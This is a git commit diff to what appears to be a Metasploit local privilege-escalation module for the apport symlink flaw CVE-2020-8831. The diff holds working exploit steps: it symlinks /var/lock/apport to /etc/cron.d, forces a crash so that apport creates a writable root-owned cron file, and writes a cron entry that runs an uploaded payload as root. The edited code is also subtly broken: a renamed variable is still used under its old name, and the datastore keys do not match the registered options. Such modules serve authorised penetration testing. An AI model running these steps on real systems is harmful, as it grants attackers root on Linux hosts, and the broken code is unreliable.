Add statuses to hijack apport method

gardnerapp · gardnerapp · commit 7c35318b3ea6 · 2025-02-12T13:55:59.000-05:00
diff --git a/modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb b/modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
@@ -67,12 +67,14 @@ def initialize(info = {})
     register_options [
       OptString.new('WRITABLE_DIR', [true, 'A directory we can write to.', '/tmp']),
       OptString.new('PAYLOAD_FILENAME', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))]),
-      OptString.new('CRON_FILENAME', [true, 'Name of the cron file', Rex::Text.rand_text_alpha(rand(8..12))]),
       OptString.new('CRON_INTERVAL', [true, 'Specify how often the Cron should run. Default is every minute.', '* * * * *'])
     ]
   end
 
   def check
+    # If you are testing the module apport needs to be reinstalled on boot every time with
+    # sudo dpkg -i apport_2.20.11-0ubuntu21_all.deb 
+    # sudo rm -rf /var/lock/apport/ -> must be run after each subsequent test!
     return CheckCode::Safe('Platform is not Linux') unless session.platform == 'linux'
 
     # Check apport version
@@ -84,7 +86,7 @@ def check
 
     return CheckCode::Detected('Unable to determine apport version') if apport.blank?
 
-    # todo determine if prior versions of apport which are NOT vulnerable
+    # todo determine if prior versions of apport are vulnerable
     apport_version = Rex::Version.new(apport.split('-').first)
 
     vulnerable_version = Rex::Version.new('2.20.11')
@@ -99,32 +101,34 @@ def check
 
   # hijack symlink by creating apport crash
   def hijack_apport
-    # Create symlink
-    # might need to change linked directory
-    cmd_exec 'ln -s /etc/cron.d /var/lock/apport'
+    # Create symlink, this will create a rwxrwxrwx root:root /etc/cron.d/lock
+    print_status("Creating symlink...")
+    link = cmd_exec ('ln -s /etc/cron.d /var/lock/apport')
+    print_status(link)
 
-    # CreatE crash and trigger apport
+    # Create crash and trigger apport
+    print_status("Triggering crash...")
     cmd_exec 'sleep 10s & kill -11 $!'
 
     # need method for seeing if file is owned by root and combine with and gate
     # TODO want to check if file is root owned to ensure exploit workedd 
-    # if uid method does not work remove Msf::Post::File::FileStat
-    #puts "uid(/etc/crontab/lock) #{uid('/etc/crontab/lock')}"
-    if !writable?('/etc/crontab/lock') #|| uid('/etc/crontab/lock') != 0
+    if !writable?('/etc/cron.d/lock') 
       fail_with(Failure::NotFound, 'Exploit was unable to create a crontab owned by root.')
+    else
+      print_good("Successfully created /etc/cron.d/lock")
     end
   end
 
   def write_payload
     print_status 'Uploading payload'
 
-    pay_dir = datastore['WritableDir']
+    payload_dir = datastore['WritableDir']
 
-    pay_dir += '/' unless pay_dir.ends_with? '/'
+    payload_dir += '/' unless pay_dir.ends_with? '/'
 
-    pay_file = datastore['PayloadFilename']
+    payload_file = datastore['PayloadFilename']
 
-    @pay_dest = "#{pay_dir}#{pay_file}"
+    @payload_dest = "#{payload_dir}#{payload_file}"
 
     # create the payload
     if target.arch.first == ARCH_CMD
@@ -136,9 +140,9 @@ def write_payload
   end
 
   def write_cron
-    cron_file = datastore['CRON_FILENAME']
+    cron_file = '/etc/cron.d/lock'
     cron_interval = datastore['CRON_INTERVAL']
-    write_file(cron_file, "#{cron_interval} #{@pay_file}")
+    write_file(cron_file, "#{cron_interval} #{@payload_dest}")
   end
 
   def exploit
